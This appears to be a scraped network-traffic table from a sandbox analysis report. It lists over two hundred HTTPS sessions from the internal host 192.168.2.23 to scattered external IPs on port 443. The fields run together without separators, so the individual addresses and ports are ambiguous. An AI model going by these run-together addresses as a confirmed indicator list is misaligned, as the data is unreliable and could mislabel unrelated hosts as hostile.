                                            21673192.168.2.2341658217.107.71.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21674192.168.2.2347506128.78.36.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21675192.168.2.2338442201.223.221.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21676192.168.2.234936896.245.69.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21677192.168.2.2360002178.154.16.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21678192.168.2.233506234.89.96.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21679192.168.2.233891214.43.222.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21680192.168.2.235675017.192.234.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21681192.168.2.234502657.98.57.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21682192.168.2.234741292.211.166.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21683192.168.2.2335314179.31.25.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21684192.168.2.2355148189.215.147.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21685192.168.2.2351616166.251.153.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21686192.168.2.233406469.154.238.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21687192.168.2.2344218155.77.252.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21688192.168.2.2334978176.221.79.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21689192.168.2.2344314178.122.75.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21690192.168.2.2348170216.65.221.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21691192.168.2.233418648.215.123.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21692192.168.2.2341092110.228.116.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21693192.168.2.2360934172.237.87.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21694192.168.2.2356618162.241.65.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21695192.168.2.2351370104.81.69.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21696192.168.2.2347804208.78.121.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21697192.168.2.23479245.210.69.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21698192.168.2.2353190107.86.63.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21699192.168.2.2336156155.236.55.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21700192.168.2.235859894.21.241.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21701192.168.2.2346044137.124.75.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21702192.168.2.2360290209.89.192.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21703192.168.2.2353430183.156.37.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21704192.168.2.234059262.248.188.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21705192.168.2.233582412.1.231.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21706192.168.2.2356208166.175.203.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21707192.168.2.2346432185.18.0.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21708192.168.2.2356292115.30.74.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21709192.168.2.235317467.104.253.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21710192.168.2.234959613.255.50.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21711192.168.2.234900471.34.252.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21712192.168.2.2354310126.118.133.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21713192.168.2.2357034120.186.233.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21714192.168.2.2360380124.41.122.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21715192.168.2.2356864156.244.68.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21716192.168.2.2360600148.182.252.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21717192.168.2.2350914141.5.63.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21718192.168.2.2346498109.225.42.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21719192.168.2.233346679.209.38.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21720192.168.2.2345514160.231.252.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21721192.168.2.2346782132.209.22.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21722192.168.2.235070249.204.170.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21723192.168.2.2352442165.167.240.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21724192.168.2.235580694.11.122.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21725192.168.2.235016880.192.96.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21726192.168.2.234256299.125.213.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21727192.168.2.2336178110.148.150.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21728192.168.2.234915487.140.205.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21729192.168.2.235856231.139.30.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21730192.168.2.233323238.170.225.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21731192.168.2.234705495.215.160.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21732192.168.2.235889218.110.233.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21733192.168.2.2347194165.228.77.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21734192.168.2.2358760143.97.86.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21735192.168.2.234883413.47.114.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21736192.168.2.234028057.240.125.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21737192.168.2.233540434.232.78.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21738192.168.2.2348086183.126.175.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21739192.168.2.2342714194.166.201.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21740192.168.2.235446618.234.157.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21741192.168.2.2351882126.224.190.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21742192.168.2.2356116115.209.68.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21743192.168.2.235006238.156.132.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21744192.168.2.2333076207.230.105.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21745192.168.2.234030281.42.166.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21746192.168.2.234113613.140.247.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21747192.168.2.233821882.127.162.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21748192.168.2.2342666170.119.118.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21749192.168.2.2343654115.58.217.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21750192.168.2.2336830146.2.93.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21751192.168.2.2342876202.60.187.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21752192.168.2.2359954222.116.220.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21753192.168.2.2333710114.40.11.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21754192.168.2.2358232143.36.157.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21755192.168.2.233772213.202.61.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21756192.168.2.2355524206.12.204.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21757192.168.2.235849477.240.88.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21758192.168.2.2350194154.242.137.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21759192.168.2.235185839.46.39.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21760192.168.2.2346054147.189.175.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21761192.168.2.2345800131.156.120.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21762192.168.2.2357554142.147.73.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21763192.168.2.2341914116.160.171.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21764192.168.2.2343686219.143.252.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21765192.168.2.236071673.154.85.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21766192.168.2.235134019.238.79.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21767192.168.2.2351926110.63.99.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21768192.168.2.2343278143.126.216.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21769192.168.2.235043819.99.110.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21770192.168.2.2350076139.157.164.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21771192.168.2.235449668.235.179.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21772192.168.2.2358124112.254.255.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21773192.168.2.2360280182.12.114.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21774192.168.2.234869027.90.156.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21775192.168.2.2333648161.162.31.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21776192.168.2.2358516169.250.169.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21777192.168.2.234660254.131.219.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21778192.168.2.234482868.6.78.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21779192.168.2.233773852.122.140.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21780192.168.2.2342944176.36.21.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21781192.168.2.2358100118.251.128.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21782192.168.2.2355614163.104.172.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21783192.168.2.233362684.74.134.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21784192.168.2.233461031.89.249.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21785192.168.2.234631093.17.101.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21786192.168.2.235816674.102.176.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21787192.168.2.2351462185.213.207.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21788192.168.2.23368329.163.73.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21789192.168.2.2339618164.211.25.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21790192.168.2.2359332176.221.125.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21791192.168.2.2355426192.164.62.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21792192.168.2.2343890198.223.161.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21793192.168.2.2341194176.155.21.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21794192.168.2.234543685.190.254.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21795192.168.2.234744041.91.46.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21796192.168.2.233969613.177.223.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21797192.168.2.2354810148.33.239.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21798192.168.2.233595091.65.89.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21799192.168.2.234818485.8.146.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21800192.168.2.2359386188.126.227.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21801192.168.2.2339244138.188.169.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21802192.168.2.234794872.117.159.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21803192.168.2.234390838.127.94.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21804192.168.2.233646859.180.116.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21805192.168.2.234265298.2.82.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21806192.168.2.2360306216.14.75.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21807192.168.2.2332794101.66.40.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21808192.168.2.2342510173.21.133.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21809192.168.2.235821075.162.65.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21810192.168.2.2342546190.19.97.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21811192.168.2.2341844169.19.177.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21812192.168.2.235363212.37.245.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21813192.168.2.23442562.43.215.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21814192.168.2.2359406109.222.38.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21815192.168.2.2350462148.177.219.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21816192.168.2.234767689.34.84.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21817192.168.2.234217013.175.60.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21818192.168.2.2334234141.105.164.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21819192.168.2.234822872.34.233.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21820192.168.2.2360196191.220.142.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21821192.168.2.234321079.159.242.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21822192.168.2.234210819.48.204.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21823192.168.2.2342842210.45.59.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21824192.168.2.2360988156.104.254.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21825192.168.2.23434309.64.112.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21826192.168.2.235459094.56.91.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21827192.168.2.2337472143.50.141.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21828192.168.2.235201474.74.244.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21829192.168.2.233418864.0.89.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21830192.168.2.233852460.187.180.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21831192.168.2.2341528155.150.168.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21832192.168.2.235326688.187.4.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21833192.168.2.234315234.162.22.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21834192.168.2.2339782116.10.208.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21835192.168.2.2350822211.241.106.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21836192.168.2.2359674189.62.161.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21837192.168.2.2349844193.20.245.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21838192.168.2.2334372177.35.2.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21839192.168.2.2354490100.36.152.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21840192.168.2.234661024.120.140.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21841192.168.2.2350432131.117.13.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21842192.168.2.234953899.90.196.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21843192.168.2.235604641.87.80.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21844192.168.2.2337174222.226.22.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21845192.168.2.2358708157.169.151.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21846192.168.2.233803050.173.198.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21847192.168.2.235219083.113.107.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21848192.168.2.233530054.73.30.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21849192.168.2.2356744198.7.229.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21850192.168.2.233750832.199.38.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21851192.168.2.2349230164.70.61.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21852192.168.2.2333334172.174.105.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21853192.168.2.2345390203.242.22.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21854192.168.2.235800472.181.213.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21855192.168.2.2339640160.225.242.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21856192.168.2.2355370222.79.46.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21857192.168.2.234919850.60.170.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21858192.168.2.2350140123.145.152.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21859192.168.2.234235257.235.83.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21860192.168.2.2339930132.102.208.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21861192.168.2.2349860167.30.221.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21862192.168.2.2336326102.166.6.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21863192.168.2.2337394109.219.43.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21864192.168.2.2354134169.177.140.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21865192.168.2.233465053.178.123.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21866192.168.2.233911880.171.226.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21867192.168.2.2340802161.226.117.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21868192.168.2.233978671.46.4.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21869192.168.2.235803457.31.241.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21870192.168.2.235077271.90.69.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21871192.168.2.2344892202.49.130.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21872192.168.2.2342014101.186.126.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21873192.168.2.235528875.211.45.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21874192.168.2.2356704169.97.102.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21875192.168.2.2354990223.138.193.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21876192.168.2.2352262164.206.79.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21877192.168.2.2336136210.161.29.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21878192.168.2.2348358202.84.59.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21879192.168.2.2340516138.188.159.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21880192.168.2.233736213.79.46.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21881192.168.2.234765842.18.150.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21882192.168.2.2359670194.226.161.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21883192.168.2.2355856205.106.40.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21884192.168.2.2353814167.237.179.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21885192.168.2.234117219.74.152.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21886192.168.2.2338986149.75.200.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21887192.168.2.235266466.137.16.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21888192.168.2.2343194195.17.216.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21889192.168.2.2352368150.99.172.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21890192.168.2.2354042207.49.34.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21891192.168.2.236038486.166.64.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21892192.168.2.235012481.63.189.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21893192.168.2.2358718162.164.28.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21894192.168.2.2342450133.169.154.46443
                                            TimestampBytes transferredDirectionData


